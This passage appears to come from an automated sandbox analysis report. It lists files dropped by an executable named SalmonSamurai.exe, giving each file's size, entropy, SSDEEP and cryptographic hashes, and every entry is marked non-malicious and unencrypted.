                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:07bju28t6QuagV1ZztzYpZ4MYnYM/LDBW5Mx0q20wCbKZL3wfzkCh1f/5FEs6rYr:6JVzbf55Z
                                                                                                                                                                                                                                          MD5:0BF28AFF31E8887E27C4CD96D3069816
                                                                                                                                                                                                                                          SHA1:B5313CF6B5FBCE7E97E32727A3FAE58B0F2F5E97
                                                                                                                                                                                                                                          SHA-256:2E1D413442DEF9CAE2D93612E3FD04F3AFAF3DD61E4ED7F86400D320AF5500C2
                                                                                                                                                                                                                                          SHA-512:95172B3B1153B31FCEB4B53681635A881457723CD1000562463D2F24712267B209B3588C085B89C985476C82D9C27319CB6378619889379DA4FAE1595CB11992
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):879149
                                                                                                                                                                                                                                          Entropy (8bit):4.32399215971305
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:Xz2UMY57hmdUoITsKMaWZKerbtsMhmksd4M+0+z20QmuOAl5VpvoxWnhygfZw/gQ:D2UMY57h9w4MSbsp5cLhdKE8
                                                                                                                                                                                                                                          MD5:7B5F52F72D3A93F76337D5CF3168EBD1
                                                                                                                                                                                                                                          SHA1:00D444B5A7F73F566E98ABADF867E6BB27433091
                                                                                                                                                                                                                                          SHA-256:798EA5D88A57D1D78FA518BF35C5098CBEB1453D2CB02EF98CD26CF85D927707
                                                                                                                                                                                                                                          SHA-512:10C6F4FAAB8CCB930228C1D9302472D0752BE19AF068EC5917249675B40F22AB24C3E29EC3264062826113B966C401046CFF70D91E7E05D8AADCC0B4E07FEC9B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):544193
                                                                                                                                                                                                                                          Entropy (8bit):4.6265566170608325
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:DczykRrlOUmTU2/S9iyBZ60DAf1X2VeQCap4M52QoLpMzu5flmd9DnwWHQgZ:+F55VoQ
                                                                                                                                                                                                                                          MD5:6D787DC113ADFB6A539674AF7D6195DB
                                                                                                                                                                                                                                          SHA1:F966461049D54C61CDD1E48EF1EA0D3330177768
                                                                                                                                                                                                                                          SHA-256:A976FAD1CC4EB29709018C5FFCC310793A7CEB2E69C806454717CCAE9CBC4D21
                                                                                                                                                                                                                                          SHA-512:6748DAD2813FC544B50DDEA0481B5ACE3EB5055FB2D985CA357403D3B799618D051051B560C4151492928D6D40FCE9BB33B167217C020BDCC3ED4CAE58F6B676
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):921748
                                                                                                                                                                                                                                          Entropy (8bit):4.3093889077968495
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:zGFGsUtYgPLdROwJgdkFSvf4QAEm5dmGhsYK/GR3TX4/NMdpqdYnLsuFQdXPtg8y:zGEAgT/Zu5J57JtK
                                                                                                                                                                                                                                          MD5:1766A05BE4DC634B3321B5B8A142C671
                                                                                                                                                                                                                                          SHA1:B959BCADC3724AE28B5FE141F3B497F51D1E28CF
                                                                                                                                                                                                                                          SHA-256:0EEE8E751B5B0AF1E226106BEB09477634F9F80774FF30894C0F5A12B925AC35
                                                                                                                                                                                                                                          SHA-512:FAEC1D6166133674A56B5E38A68F9E235155CC910B5CCEB3985981B123CC29EDA4CD60B9313AB787EC0A8F73BF715299D9BF068E4D52B766A7AB8808BD146A39
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):423481
                                                                                                                                                                                                                                          Entropy (8bit):5.516218200944141
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:yL0fCmEZW/FhjNmvgVRTKBOS+/6ocIG0uPXuyAF6WI6DkYAiKbeM/ogQbn7xjemW:QYCmNLjN3pV5v5tE77ORS
                                                                                                                                                                                                                                          MD5:8F9498D18D90477AD24EA01A97370B08
                                                                                                                                                                                                                                          SHA1:3868791B549FC7369AB90CD27684F129EBD628BE
                                                                                                                                                                                                                                          SHA-256:846943F77A425F3885689DCF12D62951C5B7646E68EADC533B8B5C2A1373F02E
                                                                                                                                                                                                                                          SHA-512:3C66A84592DEBE522F26C48B55C04198AD8A16C0DCFA05816825656C76C1C6CCCF5767B009F20ECB77D5A589EE44B0A0011EC197FEC720168A6C72C71EBF77FD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):456789
                                                                                                                                                                                                                                          Entropy (8bit):5.643595706627357
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:SGAK2lkJ2gSSSfLOAYkky1MV5QgsZfGRAxY62R9PSam7EEOEeLvx5gR4RStG2r2/:pAKWkJ2gSsAkV5QgsiR4747vx5VL/
                                                                                                                                                                                                                                          MD5:F5E1CA8A14C75C6F62D4BFF34E27DDB5
                                                                                                                                                                                                                                          SHA1:7ABA6BFF18BDC4C477DA603184D74F054805C78F
                                                                                                                                                                                                                                          SHA-256:C0043D9FA0B841DA00EC1672D60015804D882D4765A62B6483F2294C3C5B83E0
                                                                                                                                                                                                                                          SHA-512:1050F96F4F79F681B3EAF4012EC0E287C5067B75BA7A2CBE89D9B380C07698099B156A0EB2CBC5B8AA336D2DAA98E457B089935B534C4D6636987E7E7E32B169
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):373937
                                                                                                                                                                                                                                          Entropy (8bit):5.37852966615304
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Fl9jv1p49ahfjDVnjHFsRmP28Wvr5PdhpvtEDSVsEaOq:FlLpblVnjHFCm+8Sr5Pdhzq
                                                                                                                                                                                                                                          MD5:7B39423028DA71B4E776429BB4F27122
                                                                                                                                                                                                                                          SHA1:CB052AB5F734D7A74A160594B25F8A71669C38F2
                                                                                                                                                                                                                                          SHA-256:3D95C5819F57A0AD06A118A07E0B5D821032EDCF622DF9B10A09DA9AA974885F
                                                                                                                                                                                                                                          SHA-512:E40679B01AB14B6C8DFDCE588F3B47BCAFF55DBB1539B343F611B3FCBD1D0E7D8C347A2B928215A629F97E5F68D19C51AF775EC27C6F906CAC131BEAE646CE1A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):414412
                                                                                                                                                                                                                                          Entropy (8bit):5.287149423624235
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:8cPuDjrpxctogSrqRrhsO11RT9TeexAGTL6+q2WKLV9fLwY+25OM388HrmwGWNBI:8cmDZREZJy8KL1LjAS5ZzoC
                                                                                                                                                                                                                                          MD5:D58A43068BF847C7CD6284742C2F7823
                                                                                                                                                                                                                                          SHA1:497389765143FAC48AF2BD7F9A309BFE65F59ED9
                                                                                                                                                                                                                                          SHA-256:265D8B1BC479AD64FA7A41424C446139205AF8029A2469D558813EDD10727F9C
                                                                                                                                                                                                                                          SHA-512:547A1581DDA28C5C1A0231C736070D8A7B53A085A0CE643A4A1510C63A2D4670FF2632E9823CD25AE2C7CDC87FA65883E0A193853890D4415B38056CB730AB54
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):505292
                                                                                                                                                                                                                                          Entropy (8bit):5.701779406023226
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:rO2YZ2QUgbjicTver049pUVOT6z4Z72hA/Na4oQPkwaIAOenOIUNH7bbeCcX5RWX:rOpZ2eH/IzSVKo4Z728owPS58HRxVX
                                                                                                                                                                                                                                          MD5:D10D536BCD183030BA07FF5C61BF5E3A
                                                                                                                                                                                                                                          SHA1:44DD78DBA9F098AC61222EB9647D111AD1608960
                                                                                                                                                                                                                                          SHA-256:2A3D3ABC9F80BAD52BD6DA5769901E7B9E9F052B6A58A7CC95CE16C86A3AA85A
                                                                                                                                                                                                                                          SHA-512:C67AEDE9DED1100093253E350D6137AB8B2A852BD84B6C82BA1853F792E053CECD0EA0519319498AED5759BEDC66D75516A4F2F7A07696A0CEF24D5F34EF9DD2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1012272
                                                                                                                                                                                                                                          Entropy (8bit):4.2289205973296395
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:VxaK34cS7yFcH4dr/4g7M5iVUZ+xw+UFV:jf7/K5uUb
                                                                                                                                                                                                                                          MD5:C548A5F1FB5753408E44F3F011588594
                                                                                                                                                                                                                                          SHA1:E064AB403972036DAD1B35ABE9794E95DBE4CC00
                                                                                                                                                                                                                                          SHA-256:890F50A57B862F482D367713201E1E559AC778FC3A36322D1DFBBEF2535DD9CB
                                                                                                                                                                                                                                          SHA-512:6975E4BB1A90E0906CF6266F79DA6CC4AE32F72A6141943BCFCF9B33F791E9751A9AAFDE9CA537F33F6BA8E4D697125FBC2EC4FFD3BC35851F406567DAE7E631
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):425545
                                                                                                                                                                                                                                          Entropy (8bit):6.081959799252044
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:4Y3l9B6CI1zt8OhrJRFJCqM5T718I8Mtmq7hUoBAA:aZJo5D8GAA
                                                                                                                                                                                                                                          MD5:B4FBFF56E4974A7283D564C6FC0365BE
                                                                                                                                                                                                                                          SHA1:DE68BD097DEF66D63D5FF04046F3357B7B0E23AC
                                                                                                                                                                                                                                          SHA-256:8C9ACDE13EDCD40D5B6EB38AD179CC27AA3677252A9CD47990EBA38AD42833E5
                                                                                                                                                                                                                                          SHA-512:0698AA058561BB5A8FE565BB0BEC21548E246DBB9D38F6010E9B0AD9DE0F59BCE9E98841033AD3122A163DD321EE4B11ED191277CDCB8E0B455D725593A88AA5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):457220
                                                                                                                                                                                                                                          Entropy (8bit):5.634955727013476
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Ca5OlSk7unX4nkokvgneIVUoCb1DD7U5R3zv9dFaL8tx9e2lJ2I96S2:Ca5Olrpgme2UoC9c59zv9fx9eoP6S2
                                                                                                                                                                                                                                          MD5:980C27FD74CC3560B296FE8E7C77D51F
                                                                                                                                                                                                                                          SHA1:F581EFA1B15261F654588E53E709A2692D8BB8A3
                                                                                                                                                                                                                                          SHA-256:41E0F3619CDA3B00ABBBF07B9CD64EC7E4785ED4C8A784C928E582C3B6B8B7DB
                                                                                                                                                                                                                                          SHA-512:51196F6F633667E849EF20532D57EC81C5F63BAB46555CEA8FAB2963A078ACDFA84843EDED85C3B30F49EF3CEB8BE9E4EF8237E214EF9ECFF6373A84D395B407
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):455871
                                                                                                                                                                                                                                          Entropy (8bit):5.635474464056208
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:GOQDGtu4e+D8NHtVFHTPq7K4vHo4q3sb3755ZanXDEG9Aarl4zxmEA5QXls14:GOQUZ2Gu4vTqw75KEGGmEs14
                                                                                                                                                                                                                                          MD5:E4F7D9E385CB525E762ECE1AA243E818
                                                                                                                                                                                                                                          SHA1:689D784379BAC189742B74CD8700C687FEEEDED1
                                                                                                                                                                                                                                          SHA-256:523D141E59095DA71A41C14AEC8FE9EE667AE4B868E0477A46DD18A80B2007EF
                                                                                                                                                                                                                                          SHA-512:E4796134048CD12056D746F6B8F76D9EA743C61FEE5993167F607959F11FD3B496429C3E61ED5464551FD1931DE4878AB06F23A3788EE34BB56F53DB25BCB6DF
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1056673
                                                                                                                                                                                                                                          Entropy (8bit):4.264965642462621
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:AYtrLnsoR47/R7nUwmoMmWDcZubSA/d+8di3ethK5d/7dxOt3ab:lt0oNwMi3eG5d/7Ot3c
                                                                                                                                                                                                                                          MD5:8B38C65FC30210C7AF9B6FA0424266F4
                                                                                                                                                                                                                                          SHA1:116413710FFCF94FBFA38CB97A47731E43A306F5
                                                                                                                                                                                                                                          SHA-256:E8DF9A74417C5839C531D7CCAB63884A80AFB731CC62CBBB3FD141779086AC7D
                                                                                                                                                                                                                                          SHA-512:0FD349C644AC1A2E7ED0247E40900D3A9957F5BEF1351B872710D02687C934A8E63D3A7585E91F7DF78054AEFF8F7ABD8C93A94FCD20C799779A64278BAB2097
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):863911
                                                                                                                                                                                                                                          Entropy (8bit):4.295071040310227
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:OVDue+/Ti/eFcDX6WRAWXXspvidz0F5MU9G3GRe3RQR3K5/knxi4nou4bmHwIZus:eueAi2FZW2bo26lp70Kte5zGpGiBs
                                                                                                                                                                                                                                          MD5:C0EF1866167D926FB351E9F9BF13F067
                                                                                                                                                                                                                                          SHA1:6092D04EF3CE62BE44C29DA5D0D3A04985E2BC04
                                                                                                                                                                                                                                          SHA-256:88DF231CF2E506DB3453F90A797194662A5F85E23BBAC2ED3169D91A145D2091
                                                                                                                                                                                                                                          SHA-512:9E2B90F3AC1AE5744C22C2442FBCD86A8496AFC2C58F6CA060D6DBB08AF6F7411EF910A7C8CA5AEDEE99B5443D4DFF709C7935E8322CB32F8B071EE59CAEE733
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):390303
                                                                                                                                                                                                                                          Entropy (8bit):5.258177538585681
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:zCsFFfyrvxoQuXkulRopY/5BI8T5sHAVHMM/k3y:tQxoNlR6K5v5vVsMZ
                                                                                                                                                                                                                                          MD5:9B3E2F3C49897228D51A324AB625EB45
                                                                                                                                                                                                                                          SHA1:8F3DAEC46E9A99C3B33E3D0E56C03402CCC52B9D
                                                                                                                                                                                                                                          SHA-256:61A3DAAE72558662851B49175C402E9FE6FD1B279E7B9028E49506D9444855C5
                                                                                                                                                                                                                                          SHA-512:409681829A861CD4E53069D54C80315E0C8B97E5DB4CD74985D06238BE434A0F0C387392E3F80916164898AF247D17E8747C6538F08C0EF1C5E92A7D1B14F539
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):383011
                                                                                                                                                                                                                                          Entropy (8bit):5.424530593988954
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:rmRAsByIhGvbSqOp7f21zg2mKP7s4Uzwn5el4nYHOp1D:rmRGxvbSqOp7f21vs4kM5el4Jp1D
                                                                                                                                                                                                                                          MD5:AF0FD9179417BA1D7FCCA3CC5BEE1532
                                                                                                                                                                                                                                          SHA1:F746077BBF6A73C6DE272D5855D4F1CA5C3AF086
                                                                                                                                                                                                                                          SHA-256:E900F6D0DD9D5A05B5297618F1FE1600C189313DA931A9CB390EE42383EB070F
                                                                                                                                                                                                                                          SHA-512:C94791D6B84200B302073B09357ABD2A1D7576B068BAE01DCCDA7BC154A6487145C83C9133848CCF4CB9E6DC6C5A9D4BE9D818E5A0C8F440A4E04AE8EABD4A29
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):395064
                                                                                                                                                                                                                                          Entropy (8bit):5.365550895872654
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:9V01rV7gSsX5SEHDpaQe3D+qnRVd5qYx1Gp7KhaPW:96NFgSsX5S1V7d5qYx1Gp7KcPW
                                                                                                                                                                                                                                          MD5:181D2A0ECE4B67281D9D2323E9B9824D
                                                                                                                                                                                                                                          SHA1:E8BDC53757E96C12F3CD256C7812532DD524A0EA
                                                                                                                                                                                                                                          SHA-256:6629E68C457806621ED23AA53B3675336C3E643F911F8485118A412EF9ED14CE
                                                                                                                                                                                                                                          SHA-512:10D8CC9411CA475C9B659A2CC88D365E811217D957C82D9C144D94843BC7C7A254EE2451A6F485E92385A660FA01577CFFA0D64B6E9E658A87BEF8FCCBBEAF7E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):439920
                                                                                                                                                                                                                                          Entropy (8bit):5.766175831058526
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:f2jujSo9/D+Xgv3iWGb1vPiCUdhUo3Ymhz1QhjAB5cUE447e:Sc3N1Qhw5me
                                                                                                                                                                                                                                          MD5:18D49D5376237BB8A25413B55751A833
                                                                                                                                                                                                                                          SHA1:0B47A7381DE61742AC2184850822C5FA2AFA559E
                                                                                                                                                                                                                                          SHA-256:1729AA5C8A7E24A0DB98FEBCC91DF8B7B5C16F9B6BB13A2B0795038F2A14B981
                                                                                                                                                                                                                                          SHA-512:45344A533CC35C8CE05CF29B11DA6C0F97D8854DAE46CF45EF7D090558EF95C3BD5FDC284D9A7809F0B2BF30985002BE2AA6A4749C0D9AE9BDFF4AD13DE4E570
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):415447
                                                                                                                                                                                                                                          Entropy (8bit):5.426006792591415
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Bm1HqF4Znh9GzBtNBXBLd1OUDcpryHF55NJND0bsRzlb2:UHrnhMzX5PJB4sRxC
                                                                                                                                                                                                                                          MD5:0D9DEA9E24645C2A3F58E4511C564A36
                                                                                                                                                                                                                                          SHA1:DCD2620A1935C667737EEA46CA7BB2BDCB31F3A6
                                                                                                                                                                                                                                          SHA-256:CA7B880391FCD319E976FCC9B5780EA71DE655492C4A52448C51AB2170EEEF3B
                                                                                                                                                                                                                                          SHA-512:8FCF871F8BE7727E2368DF74C05CA927C5F0BC3484C4934F83C0ABC98ECAF774AD7ABA56E1BF17C92B1076C0B8EB9C076CC949CD5427EFCADE9DDF14F6B56BC5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):416977
                                                                                                                                                                                                                                          Entropy (8bit):5.401132911995885
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:isWkrPyGJeOMqieJVJJxhlOlxLu3ov5xKqSR0B:X3PBxj8zv5xKqSRW
                                                                                                                                                                                                                                          MD5:6A7232F316358D8376A1667426782796
                                                                                                                                                                                                                                          SHA1:8B70FE0F3AB2D73428F19ECD376C5DEBA4A0BB6C
                                                                                                                                                                                                                                          SHA-256:6A526CD5268B80DF24104A7F40F55E4F1068185FEBBBB5876BA2CB7F78410F84
                                                                                                                                                                                                                                          SHA-512:40D24B3D01E20AE150083B00BB6E10BCA81737C48219BCE22FA88FAAAD85BDC8C56AC9B1EB01854173B0ED792E34BDFBAC26D3605B6A35C14CF2824C000D0DA1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):430191
                                                                                                                                                                                                                                          Entropy (8bit):5.460617985170646
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:pqgw32K4aoFt3GgnSYn0vLi5OU6ois2a/7ulqr:pqgVzFt3GgnSY0vLi5OXo3/5r
                                                                                                                                                                                                                                          MD5:99EAA3D101354088379771FD85159DE1
                                                                                                                                                                                                                                          SHA1:A32DB810115D6DCF83A887E71D5B061B5EEFE41F
                                                                                                                                                                                                                                          SHA-256:33F4C20F7910BC3E636BC3BEC78F4807685153242DD4BC77648049772CF47423
                                                                                                                                                                                                                                          SHA-512:C6F87DA1B5C156AA206DC21A9DA3132CBFB0E12E10DA7DC3B60363089DE9E0124BBAD00A233E61325348223FC5953D4F23E46FE47EC8E7CA07702AC73F3FD2E9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):703696
                                                                                                                                                                                                                                          Entropy (8bit):4.836890612319527
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:ckXRY5eXN2hHO3j/jHXzvMBsiA2kkce8P/XyFGGJGswfaZ/LeUFCcYWIkHWajf+F:ck5LZ5w6pF
                                                                                                                                                                                                                                          MD5:AB9902025DCF7D5408BF6377B046272B
                                                                                                                                                                                                                                          SHA1:C9496E5AF3E2A43377290A4883C0555E27B1F10F
                                                                                                                                                                                                                                          SHA-256:983B15DCC31D0E9A3DA78CD6021E5ADD2A3C2247322ADED9454A5D148D127AAE
                                                                                                                                                                                                                                          SHA-512:D255D5F5B6B09AF2CDEC7B9C171EEBB1DE1094CC5B4DDF43A3D4310F8F5F223AC48B8DA97A07764D1B44F1D4A14FE3A0C92A0CE6FE9A4AE9A6B4A342E038F842
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):443094
                                                                                                                                                                                                                                          Entropy (8bit):5.818852266406701
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:vQt/WMWyqiLJcPXPk5ELALWaQlKDEmLFGR:vQYfyqiWPXM5ELALWaQlwdLE
                                                                                                                                                                                                                                          MD5:C6C7396DBFB989F034D50BD053503366
                                                                                                                                                                                                                                          SHA1:089F176B88235CCE5BCA7ABFCC78254E93296D61
                                                                                                                                                                                                                                          SHA-256:439F7D6C23217C965179898754EDCEF8FD1248BDD9B436703BF1FF710701117A
                                                                                                                                                                                                                                          SHA-512:1476963F47B45D2D26536706B7EEBA34CFAE124A3087F7727C4EFE0F19610F94393012CDA462060B1A654827E41F463D7226AFA977654DCD85B27B7F8D1528EB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):427791
                                                                                                                                                                                                                                          Entropy (8bit):5.48540289392965
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:iyCeC3SMQRB21BPDwY5oEcAVOlJgi/fzxzqg:iTJ6kDwY5oEc0i/fzxt
                                                                                                                                                                                                                                          MD5:D4BD9F20FD29519D6B017067E659442C
                                                                                                                                                                                                                                          SHA1:782283B65102DE4A0A61B901DEA4E52AB6998F22
                                                                                                                                                                                                                                          SHA-256:F33AFA6B8DF235B09B84377FC3C90403C159C87EDD8CD8004B7F6EDD65C85CE6
                                                                                                                                                                                                                                          SHA-512:ADF8D8EC17E8B05771F47B19E8027F88237AD61BCA42995F424C1F5BD6EFA92B23C69D363264714C1550B9CD0D03F66A7CFB792C3FBF9D5C173175B0A8C039DC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):660194
                                                                                                                                                                                                                                          Entropy (8bit):4.761695251077794
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:oLNvoUKEuNI0I4Ki1eg82ATs+Hc549x4moW037LJzk/k/N:xrnqJc5Axjw
                                                                                                                                                                                                                                          MD5:CBB817A58999D754F99582B72E1AE491
                                                                                                                                                                                                                                          SHA1:6EC3FD06DEE0B1FE5002CB0A4FE8EC533A51F9FD
                                                                                                                                                                                                                                          SHA-256:4BD7E466CB5F5B0A451E1192AA1ABAAF9526855A86D655F94C9CE2183EC80C25
                                                                                                                                                                                                                                          SHA-512:EFEF29CEDB7B08D37F9DF1705D36613F423E994A041B137D5C94D2555319FFB068BB311884C9D4269B0066746DACD508A7D01DF40A8561590461D5F02CB52F8B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):385361
                                                                                                                                                                                                                                          Entropy (8bit):5.543491670458518
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:M4pITVzssdlJ9EAjiws8cB7xjpZ/4LLXru9M9SOxDE/xUDvZv5pB5mEgb7:BpIXzJ9V2B1q5/5mz
                                                                                                                                                                                                                                          MD5:502E4A8B3301253ABE27C4FD790FBE90
                                                                                                                                                                                                                                          SHA1:17ABCD7A84DA5F01D12697E0DFFC753FFB49991A
                                                                                                                                                                                                                                          SHA-256:7D72E3ADB35E13EC90F2F4271AD2A9B817A2734DA423D972517F3CFF299165FD
                                                                                                                                                                                                                                          SHA-512:BD270ABAF9344C96B0F63FC8CEC04F0D0AC9FC343AB5A80F5B47E4B13B8B1C0C4B68F19550573A1D965BB18A27EDF29F5DD592944D754B80EA9684DBCEDEA822
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):404460
                                                                                                                                                                                                                                          Entropy (8bit):5.342349721117576
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:icM47G565vqimUwbQuBndO8gJGgnATm5A1vZcsToe4t2ht:iy7GsP5Ar
                                                                                                                                                                                                                                          MD5:39277AE2D91FDC1BD38BEA892B388485
